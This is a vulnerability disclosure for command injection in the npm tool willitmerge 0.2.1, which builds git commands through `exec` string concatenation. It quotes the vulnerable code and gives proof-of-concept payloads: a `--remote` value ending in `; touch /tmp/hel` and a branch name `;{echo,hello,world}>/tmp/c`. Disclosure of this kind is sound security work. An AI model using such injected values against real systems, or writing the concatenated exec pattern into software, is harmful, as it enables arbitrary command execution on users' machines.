Command Injection vulnerability in `willitmerge@0.2.1`

Disclosing a Command Injection vulnerability in willitmerge@0.2.1. The willitmerge project describes itself as a command line tool to check if pull requests are mergeable. This report is now public after responsible disclosure and outreach to the maintainer, who has not yet acknowledged the issue.
Resources:
- Project’s GitHub source code: https://github.com/shama/willitmerge/
- Project’s npm package: https://www.npmjs.com/package/willitmerge
Background on exploitation
I’m reporting a Command Injection vulnerability in the willitmerge npm package.
The vulnerability stems from the package's use of the insecure child process execution API `exec`, into which it concatenates user input. That input is either supplied through a command-line flag or is under the control of collaborators in the target repository, so a malicious value breaks out of the intended git command and runs as an additional shell command.
Exploit
POC 1
- Install `willitmerge`
- Run it with the following command: `willitmerge --verbose --remote "https://github.com/lirantal/npq.git; touch /tmp/hel"`
- Confirm the file `/tmp/hel` is created on disk
GitHub-sourced attack vector
Lines 189-197 in lib/willitmerge.js pass user input controlled by repository collaborators into the git command:
```js
var cmds = [
  'git checkout -b ' + branch + ' ' + that.options.remote + '/' + iss.base.ref,
  'git remote add ' + branch + ' ' + gitUrl,
  'git pull ' + branch + ' ' + iss.head.ref,
  'git reset --merge HEAD',
  'git checkout ' + origBranch,
  'git branch -D ' + branch,
  'git remote rm ' + branch
];
```
Users creating malicious branch names such as `;{echo,hello,world}>/tmp/c`
This is a similar attack vector to the one reported for the pullit vulnerability.